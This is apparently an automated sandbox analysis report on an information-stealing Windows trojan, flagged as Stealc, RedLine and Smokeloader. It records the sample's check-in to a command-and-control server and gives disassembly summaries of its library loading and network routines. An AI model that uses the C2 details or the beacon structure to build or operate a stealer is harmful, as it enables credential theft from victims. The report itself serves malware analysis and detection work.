Oct 26, 2024 19:22:27.381299019 CEST	89	OUT	GET / HTTP/1.1 Host: 94.141.122.159 Connection: Keep-Alive Cache-Control: no-cache
Oct 26, 2024 19:22:28.277149916 CEST	203	IN	HTTP/1.1 200 OK Date: Sat, 26 Oct 2024 17:22:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 26, 2024 19:22:28.281810045 CEST	418	OUT	POST /baf27292fb61e144.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI Host: 94.141.122.159 Content-Length: 217 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 33 42 41 42 45 38 31 44 44 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="hwid"13BABE81DD3A4043728354------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="build"LogsDiller------KJDGDBFBGIDGIEBGHCGI--
Oct 26, 2024 19:22:28.565334082 CEST	210	IN	HTTP/1.1 200 OK Date: Sat, 26 Oct 2024 17:22:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	13:22:20
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\uCEeVGAWIB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\uCEeVGAWIB.exe"
Imagebase:	0x400000
File size:	401'408 bytes
MD5 hash:	9A4891BCF21B6639412F96C108A27744
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:22:27
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 1052
Imagebase:	0x150000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	4.9%
Signature Coverage:	12.2%
Total number of Nodes:	1418
Total number of Limit Nodes:	28

Executed Functions

Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
strlen.MSVCRT ref: 004046F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

Function 00419860 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00898850), ref: 004198A1
GetProcAddress.KERNEL32(76210000,00898A18), ref: 004198BA
GetProcAddress.KERNEL32(76210000,00898A00), ref: 004198D2
GetProcAddress.KERNEL32(76210000,00898A60), ref: 004198EA
GetProcAddress.KERNEL32(76210000,00898AC0), ref: 00419903
GetProcAddress.KERNEL32(76210000,00899A30), ref: 0041991B
GetProcAddress.KERNEL32(76210000,00896F88), ref: 00419933
GetProcAddress.KERNEL32(76210000,00896E68), ref: 0041994C
GetProcAddress.KERNEL32(76210000,00898A30), ref: 00419964
GetProcAddress.KERNEL32(76210000,00898A48), ref: 0041997C
GetProcAddress.KERNEL32(76210000,00898A90), ref: 00419995
GetProcAddress.KERNEL32(76210000,00898A78), ref: 004199AD
GetProcAddress.KERNEL32(76210000,00896DE8), ref: 004199C5
GetProcAddress.KERNEL32(76210000,00898AA8), ref: 004199DE
GetProcAddress.KERNEL32(76210000,008C60B8), ref: 004199F6
GetProcAddress.KERNEL32(76210000,00896EC8), ref: 00419A0E
GetProcAddress.KERNEL32(76210000,008C5FC8), ref: 00419A27
GetProcAddress.KERNEL32(76210000,008C61C0), ref: 00419A3F
GetProcAddress.KERNEL32(76210000,00896CE8), ref: 00419A57
GetProcAddress.KERNEL32(76210000,008C5FF8), ref: 00419A70
GetProcAddress.KERNEL32(76210000,00896F08), ref: 00419A88
LoadLibraryA.KERNEL32(008C6238,?,00416A00), ref: 00419A9A
LoadLibraryA.KERNEL32(008C5FE0,?,00416A00), ref: 00419AAB
LoadLibraryA.KERNEL32(008C6178,?,00416A00), ref: 00419ABD
LoadLibraryA.KERNEL32(008C6160,?,00416A00), ref: 00419ACF
LoadLibraryA.KERNEL32(008C6208,?,00416A00), ref: 00419AE0
GetProcAddress.KERNEL32(75B30000,008C61D8), ref: 00419B02
GetProcAddress.KERNEL32(751E0000,008C6190), ref: 00419B23
GetProcAddress.KERNEL32(751E0000,008C60D0), ref: 00419B3B
GetProcAddress.KERNEL32(76910000,008C6220), ref: 00419B5D
GetProcAddress.KERNEL32(75670000,00896F28), ref: 00419B7E
GetProcAddress.KERNEL32(77310000,00899B60), ref: 00419B9F
GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00419BB6

Strings

NtQueryInformationProcess, xrefs: 00419BAA
Fs, xrefs: 00419B41

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Fs$NtQueryInformationProcess
API String ID: 2238633743-1241331114
Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
StrCmpCA.SHLWAPI(?,008CAEB0), ref: 0040493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,008CAEC0), ref: 00404DE8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
InternetCloseHandle.WININET(00000000), ref: 00404EAD
InternetCloseHandle.WININET(00000000), ref: 00404EC5
HttpOpenRequestA.WININET(00000000,008CAEF0,?,008CA638,00000000,00000000,00400100,00000000), ref: 00404B15

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

InternetCloseHandle.WININET(00000000), ref: 00404ECF

Strings

", xrefs: 00404D33
", xrefs: 00404BF2
------, xrefs: 00404C69
------, xrefs: 00404B28
------, xrefs: 004049BD

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
